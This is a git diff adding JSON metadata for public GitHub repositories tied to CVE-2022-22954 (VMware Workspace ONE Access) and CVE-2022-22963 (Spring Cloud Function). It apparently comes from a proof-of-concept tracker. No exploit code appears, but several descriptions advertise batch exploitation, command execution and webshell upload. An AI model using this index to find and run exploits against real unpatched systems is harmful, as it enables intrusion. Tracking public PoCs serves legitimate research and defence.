"id": 102047728, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102047728?v=4", + "html_url": "https:\/\/github.com\/jax7sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jax7sec\/CVE-2022-22954", + "description": "提供批量扫描URL以及执行命令功能。Workspace ONE Access 模板注入漏洞,可执行任意代码", + "fork": false, + "created_at": "2022-04-12T04:14:36Z", + "updated_at": "2022-08-25T18:06:09Z", + "pushed_at": "2022-04-15T11:35:35Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 480676740, + "name": "CVE-2022-22954-VMware-RCE", + "full_name": "bb33bb\/CVE-2022-22954-VMware-RCE", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/CVE-2022-22954-VMware-RCE", + "description": "CVE-2022-22954-VMware-RCE批量检测POC", + "fork": false, + "created_at": "2022-04-12T06:09:55Z", + "updated_at": "2024-08-12T20:22:21Z", + "pushed_at": "2022-04-12T13:21:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 480683846, + "name": "VMware-CVE-2022-22954", + "full_name": "lucksec\/VMware-CVE-2022-22954", + "owner": { + "login": "lucksec", + "id": 59011386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59011386?v=4", + "html_url": "https:\/\/github.com\/lucksec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lucksec\/VMware-CVE-2022-22954", + "description": null, + "fork": false, + "created_at": "2022-04-12T06:35:10Z", + "updated_at": "2022-08-15T15:42:19Z", + "pushed_at": "2022-04-12T06:46:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 480722090, + "name": "-CVE-2022-22954-scanner", + "full_name": "mumu2020629\/-CVE-2022-22954-scanner", + "owner": { + "login": "mumu2020629", + "id": 70618861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70618861?v=4", + "html_url": "https:\/\/github.com\/mumu2020629", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mumu2020629\/-CVE-2022-22954-scanner", + "description": null, + "fork": false, + "created_at": "2022-04-12T08:36:33Z", + "updated_at": "2023-03-02T11:15:59Z", + "pushed_at": "2022-04-14T13:19:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 480742480, + "name": "CVE-2022-22954-Testi", + "full_name": "MSeymenD\/CVE-2022-22954-Testi", + "owner": { + "login": "MSeymenD", + "id": 83572774, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83572774?v=4", + "html_url": "https:\/\/github.com\/MSeymenD", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MSeymenD\/CVE-2022-22954-Testi", + "description": "CVE-2022-22954 Açığı test etme", + "fork": false, + "created_at": "2022-04-12T09:35:17Z", + "updated_at": "2022-04-14T10:25:38Z", + "pushed_at": "2022-04-12T09:44:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 480922330, + "name": "cve-2022-22954", + "full_name": "corelight\/cve-2022-22954", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/cve-2022-22954", + "description": null, + "fork": false, + "created_at": "2022-04-12T18:08:58Z", + "updated_at": "2024-10-24T13:39:32Z", + "pushed_at": "2024-10-25T12:23:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 480975254, + "name": "CVE-2022-22954_VMware_PoC", + "full_name": "DrorDvash\/CVE-2022-22954_VMware_PoC", + "owner": { + "login": "DrorDvash", + "id": 8413651, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8413651?v=4", + "html_url": "https:\/\/github.com\/DrorDvash", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DrorDvash\/CVE-2022-22954_VMware_PoC", + "description": "PoC for CVE-2022-22954 - VMware Workspace ONE Access Freemarker Server-Side Template Injection", + "fork": false, + "created_at": "2022-04-12T21:15:27Z", + "updated_at": "2024-11-01T03:31:51Z", + "pushed_at": "2022-04-12T23:19:41Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 481069232, + "name": "CVE-2022-22954", + "full_name": "Jun-5heng\/CVE-2022-22954", + "owner": { + "login": "Jun-5heng", + "id": 88525975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88525975?v=4", + "html_url": "https:\/\/github.com\/Jun-5heng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jun-5heng\/CVE-2022-22954", + "description": "VMware Workspace ONE Access远程代码执行漏洞 \/ Code By:Jun_sheng", + "fork": false, + "created_at": "2022-04-13T04:25:54Z", + "updated_at": "2022-04-13T04:28:45Z", + "pushed_at": "2022-04-19T06:38:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 481141119, + "name": "CVE-2022-22954-PoC", + "full_name": "tunelko\/CVE-2022-22954-PoC", + "owner": { + "login": "tunelko", + "id": 1008217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1008217?v=4", + "html_url": "https:\/\/github.com\/tunelko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tunelko\/CVE-2022-22954-PoC", + "description": "VMware Workspace ONE Access and Identity Manager RCE via SSTI - Test script for shodan, file or manual. ", + "fork": false, + "created_at": "2022-04-13T08:52:15Z", + "updated_at": "2023-08-27T09:17:37Z", + "pushed_at": "2024-02-13T13:51:41Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 481289176, + "name": "CVE-2022-22954", + "full_name": "bewhale\/CVE-2022-22954", + "owner": { + "login": "bewhale", + "id": 42403886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42403886?v=4", + "html_url": "https:\/\/github.com\/bewhale", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bewhale\/CVE-2022-22954", + "description": "CVE-2022-22954 VMware Workspace ONE Access freemarker SSTI 漏洞 命令执行、批量检测脚本、文件写入", + "fork": false, + "created_at": "2022-04-13T16:18:56Z", + "updated_at": "2024-08-12T20:22:24Z", + "pushed_at": "2022-04-26T04:26:00Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 69, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 481779348, + "name": "VMware-CVE-2022-22954-Command-Injector", + "full_name": "emilyastranova\/VMware-CVE-2022-22954-Command-Injector", + "owner": { + "login": "emilyastranova", + "id": 16725119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16725119?v=4", + "html_url": "https:\/\/github.com\/emilyastranova", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emilyastranova\/VMware-CVE-2022-22954-Command-Injector", + "description": "Proof of Concept for exploiting VMware CVE-2022-22954", + "fork": false, + "created_at": "2022-04-14T23:38:06Z", + "updated_at": "2022-04-16T10:53:07Z", + "pushed_at": "2022-04-15T00:11:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 482063610, + "name": "CVE-2022-22954", + "full_name": "MLX15\/CVE-2022-22954", + "owner": { + "login": "MLX15", + "id": 62066081, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62066081?v=4", + "html_url": "https:\/\/github.com\/MLX15", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MLX15\/CVE-2022-22954", + "description": "CVE-2022-22954 VMware Workspace ONE Access free marker SSTI", + "fork": false, + "created_at": "2022-04-15T19:26:56Z", + "updated_at": "2024-11-02T03:44:32Z", + "pushed_at": "2022-04-15T19:39:10Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 482302278, + "name": "CVE-2022-22954-POC", + "full_name": "mhurts\/CVE-2022-22954-POC", + "owner": { + "login": "mhurts", + "id": 51972444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972444?v=4", + "html_url": "https:\/\/github.com\/mhurts", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhurts\/CVE-2022-22954-POC", + "description": null, + "fork": false, + "created_at": "2022-04-16T16:18:13Z", + "updated_at": "2022-11-17T07:23:34Z", + "pushed_at": "2022-04-15T02:33:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 488921076, + "name": "CVE-2022-22954", + "full_name": "nguyenv1nK\/CVE-2022-22954", + "owner": { + "login": "nguyenv1nK", + "id": 40865570, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40865570?v=4", + "html_url": "https:\/\/github.com\/nguyenv1nK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nguyenv1nK\/CVE-2022-22954", + "description": "CVE-2022-22954 analyst", + "fork": false, + "created_at": "2022-05-05T10:06:44Z", + "updated_at": "2022-05-05T10:15:15Z", + "pushed_at": "2022-05-05T10:43:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 498873517, + "name": "CVE-2022-22954", + "full_name": "Chocapikk\/CVE-2022-22954", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-22954", + "description": "Python script to exploit CVE-2022-22954 and then exploit CVE-2022-22960", + "fork": false, + "created_at": "2022-06-01T19:33:32Z", + "updated_at": "2024-08-12T20:23:45Z", + "pushed_at": "2022-06-01T23:50:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 498898344, + "name": "CVE-2022-22954", + "full_name": "secfb\/CVE-2022-22954", + "owner": { + "login": "secfb", + "id": 38748801, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38748801?v=4", + "html_url": "https:\/\/github.com\/secfb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secfb\/CVE-2022-22954", + "description": "Python script to exploit CVE-2022-22954 and then exploit CVE-2022-22960", + "fork": false, + "created_at": "2022-06-01T21:05:56Z", + "updated_at": "2022-06-01T21:05:53Z", + "pushed_at": "2022-06-01T23:53:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 499442667, + "name": "CVE-2022-22954", + "full_name": "orwagodfather\/CVE-2022-22954", + "owner": { + "login": "orwagodfather", + "id": 55083178, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55083178?v=4", + "html_url": "https:\/\/github.com\/orwagodfather", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orwagodfather\/CVE-2022-22954", + "description": null, + "fork": false, + "created_at": "2022-06-03T08:51:44Z", + "updated_at": "2024-10-13T17:46:27Z", + "pushed_at": "2022-06-03T08:52:06Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 499449934, + "name": "CVE-2022-22954", + "full_name": "b4dboy17\/CVE-2022-22954", + "owner": { + "login": "b4dboy17", + "id": 83988282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83988282?v=4", + "html_url": "https:\/\/github.com\/b4dboy17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b4dboy17\/CVE-2022-22954", + "description": "VMware Workspace ONE Access and Identity Manager RCE via SSTI. CVE-2022-22954 - PoC SSTI * exploit+payload+shodan (ну набором)", + "fork": false, + "created_at": "2022-06-03T09:17:12Z", + "updated_at": "2023-03-13T03:53:28Z", + "pushed_at": "2022-06-03T09:18:37Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 502373402, + "name": "CVE-2022-22954", + "full_name": "arzuozkan\/CVE-2022-22954", + "owner": { + "login": "arzuozkan", + "id": 48025290, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48025290?v=4", + "html_url": "https:\/\/github.com\/arzuozkan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arzuozkan\/CVE-2022-22954", + "description": "Practising technical writing with researching CVE-2022-22954 VMware Workspace ONE Access RCE vulnerability.", + "fork": false, + "created_at": "2022-06-11T14:39:57Z", + "updated_at": "2022-06-14T18:58:50Z", + "pushed_at": "2022-06-11T14:42:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 524471767, + "name": "CVE-2022-22954", + "full_name": "amit-pathak009\/CVE-2022-22954", + "owner": { + "login": "amit-pathak009", + "id": 72250138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72250138?v=4", + "html_url": "https:\/\/github.com\/amit-pathak009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amit-pathak009\/CVE-2022-22954", + "description": null, + "fork": false, + "created_at": "2022-08-13T18:00:04Z", + "updated_at": "2022-06-02T01:44:19Z", + "pushed_at": "2022-06-02T01:44:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 524471940, + "name": "CVE-2022-22954-PoC", + "full_name": "amit-pathak009\/CVE-2022-22954-PoC", + "owner": { + "login": "amit-pathak009", + "id": 72250138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72250138?v=4", + "html_url": "https:\/\/github.com\/amit-pathak009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amit-pathak009\/CVE-2022-22954-PoC", + "description": null, + "fork": false, + "created_at": "2022-08-13T18:00:39Z", + "updated_at": "2022-06-01T22:41:09Z", + "pushed_at": "2022-06-01T22:41:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 545257457, + "name": "VcenterKiller", + "full_name": "Schira4396\/VcenterKiller", + "owner": { + "login": "Schira4396", + "id": 57404930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57404930?v=4", + "html_url": "https:\/\/github.com\/Schira4396", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Schira4396\/VcenterKiller", + "description": "一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972\/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接", + "fork": false, + "created_at": "2022-10-04T03:39:27Z", + "updated_at": "2024-11-28T16:39:31Z", + "pushed_at": "2024-04-25T06:09:38Z", + "stargazers_count": 1335, + "watchers_count": 1335, + "has_discussions": false, + "forks_count": 165, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "go", + "golang", + "log4j", + "log4shell", + "scan", + "vcenter" + ], + "visibility": "public", + "forks": 165, + "watchers": 1335, + "score": 0, + "subscribers_count": 15 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22963.json b/2022/CVE-2022-22963.json new file mode 100644 index 0000000000..d92b8f9df9 --- /dev/null +++ b/2022/CVE-2022-22963.json @@ -0,0 +1,866 @@ +[ + { + "id": 474212748, + "name": "spring-spel-0day-poc", + "full_name": "hktalent\/spring-spel-0day-poc", + "owner": { + "login": "hktalent", + "id": 18223385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4", + "html_url": "https:\/\/github.com\/hktalent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hktalent\/spring-spel-0day-poc", + "description": "spring-cloud \/ spring-cloud-function,spring.cloud.function.routing-expression,RCE,0day,0-day,POC,EXP,CVE-2022-22963", + "fork": false, + "created_at": "2022-03-26T01:40:04Z", + "updated_at": "2024-11-23T23:33:13Z", + "pushed_at": "2023-03-05T12:41:19Z", + "stargazers_count": 355, + "watchers_count": 355, + "has_discussions": false, + "forks_count": 82, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve-2022-22963", + "exp", + "java", + "poc", + "rce", + "spel", + "spring", + "spring-cloud-function" + ], + "visibility": "public", + "forks": 82, + "watchers": 355, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 475726184, + "name": "CVE-2022-22963", + "full_name": "dinosn\/CVE-2022-22963", + "owner": { + "login": "dinosn", + "id": 3851678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3851678?v=4", + "html_url": "https:\/\/github.com\/dinosn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dinosn\/CVE-2022-22963", + "description": "CVE-2022-22963 PoC ", + "fork": false, + "created_at": "2022-03-30T05:04:24Z", + "updated_at": "2024-08-12T20:21:59Z", + "pushed_at": "2022-03-30T06:01:04Z", + "stargazers_count": 115, + "watchers_count": 115, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 45, + "watchers": 115, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 475850261, + "name": "CVE-2022-22963", + "full_name": "RanDengShiFu\/CVE-2022-22963", + "owner": { + "login": "RanDengShiFu", + "id": 40227914, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40227914?v=4", + "html_url": "https:\/\/github.com\/RanDengShiFu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RanDengShiFu\/CVE-2022-22963", + "description": "CVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_exploit", + "fork": false, + "created_at": "2022-03-30T11:36:42Z", + "updated_at": "2024-05-21T08:47:51Z", + "pushed_at": "2022-03-30T11:54:22Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 475948668, + "name": "CVE-2022-22963", + "full_name": "darryk10\/CVE-2022-22963", + "owner": { + "login": "darryk10", + "id": 77834235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77834235?v=4", + "html_url": "https:\/\/github.com\/darryk10", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darryk10\/CVE-2022-22963", + "description": null, + "fork": false, + "created_at": "2022-03-30T15:49:32Z", + "updated_at": "2023-12-12T16:38:39Z", + "pushed_at": "2022-04-15T06:39:52Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 35, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 475986847, + "name": "CVE-2022-22963-PoC", + "full_name": "Kirill89\/CVE-2022-22963-PoC", + "owner": { + "login": "Kirill89", + "id": 2003936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2003936?v=4", + "html_url": "https:\/\/github.com\/Kirill89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kirill89\/CVE-2022-22963-PoC", + "description": null, + "fork": false, + "created_at": "2022-03-30T17:37:35Z", + "updated_at": "2023-02-15T10:03:43Z", + "pushed_at": "2022-03-30T17:40:21Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 476016878, + "name": "Spring0DayCoreExploit", + "full_name": "stevemats\/Spring0DayCoreExploit", + "owner": { + "login": "stevemats", + "id": 30528167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30528167?v=4", + "html_url": "https:\/\/github.com\/stevemats", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stevemats\/Spring0DayCoreExploit", + "description": "{ Spring Core 0day CVE-2022-22963 }", + "fork": false, + "created_at": "2022-03-30T19:07:35Z", + "updated_at": "2023-04-18T13:31:19Z", + "pushed_at": "2022-03-30T19:10:21Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476271423, + "name": "CVE-2022-22963", + "full_name": "puckiestyle\/CVE-2022-22963", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2022-22963", + "description": null, + "fork": false, + "created_at": "2022-03-31T11:14:46Z", + "updated_at": "2022-03-31T11:22:08Z", + "pushed_at": "2022-03-31T11:33:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476343941, + "name": "CVE-2022-22963", + "full_name": "me2nuk\/CVE-2022-22963", + "owner": { + "login": "me2nuk", + "id": 57348147, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57348147?v=4", + "html_url": "https:\/\/github.com\/me2nuk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/me2nuk\/CVE-2022-22963", + "description": "Spring Cloud Function Vulnerable Application \/ CVE-2022-22963", + "fork": false, + "created_at": "2022-03-31T14:32:14Z", + "updated_at": "2023-12-12T16:38:06Z", + "pushed_at": "2022-04-01T12:51:25Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476465221, + "name": "Spring-CVE", + "full_name": "kh4sh3i\/Spring-CVE", + "owner": { + "login": "kh4sh3i", + "id": 64693844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4", + "html_url": "https:\/\/github.com\/kh4sh3i", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kh4sh3i\/Spring-CVE", + "description": "This includes CVE-2022-22963, a Spring SpEL \/ Expression Resource Access Vulnerability, as well as CVE-2022-22965, the spring-webmvc\/spring-webflux RCE termed \"SpringShell\".", + "fork": false, + "created_at": "2022-03-31T20:19:51Z", + "updated_at": "2024-02-20T06:50:27Z", + "pushed_at": "2022-03-31T20:58:54Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22963", + "cve-2022-22965", + "rce", + "spring", + "spring4shell", + "springsecurity", + "springshell" + ], + "visibility": "public", + "forks": 7, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 476680845, + "name": "CVE-2022-22963", + "full_name": "AayushmanThapaMagar\/CVE-2022-22963", + "owner": { + "login": "AayushmanThapaMagar", + "id": 58677654, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58677654?v=4", + "html_url": "https:\/\/github.com\/AayushmanThapaMagar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AayushmanThapaMagar\/CVE-2022-22963", + "description": "POC for CVE-2022-22963", + "fork": false, + "created_at": "2022-04-01T10:47:56Z", + "updated_at": "2022-04-02T02:08:09Z", + "pushed_at": "2022-04-01T10:48:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 477260600, + "name": "cve-2022-22963", + "full_name": "twseptian\/cve-2022-22963", + "owner": { + "login": "twseptian", + "id": 9025301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4", + "html_url": "https:\/\/github.com\/twseptian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twseptian\/cve-2022-22963", + "description": "Spring Cloud Function SpEL - cve-2022-22963", + "fork": false, + "created_at": "2022-04-03T06:45:51Z", + "updated_at": "2022-04-03T07:36:26Z", + "pushed_at": "2022-04-03T07:08:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22963", + "spring-cloud-function-spel", + "sprint-cloud-functions" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 478225648, + "name": "SpringCloudFunction-Research", + "full_name": "SealPaPaPa\/SpringCloudFunction-Research", + "owner": { + "login": "SealPaPaPa", + "id": 102163428, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102163428?v=4", + "html_url": "https:\/\/github.com\/SealPaPaPa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SealPaPaPa\/SpringCloudFunction-Research", + "description": "CVE-2022-22963 research", + "fork": false, + "created_at": "2022-04-05T17:06:55Z", + "updated_at": "2022-04-07T10:59:37Z", + "pushed_at": "2022-04-05T18:09:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": 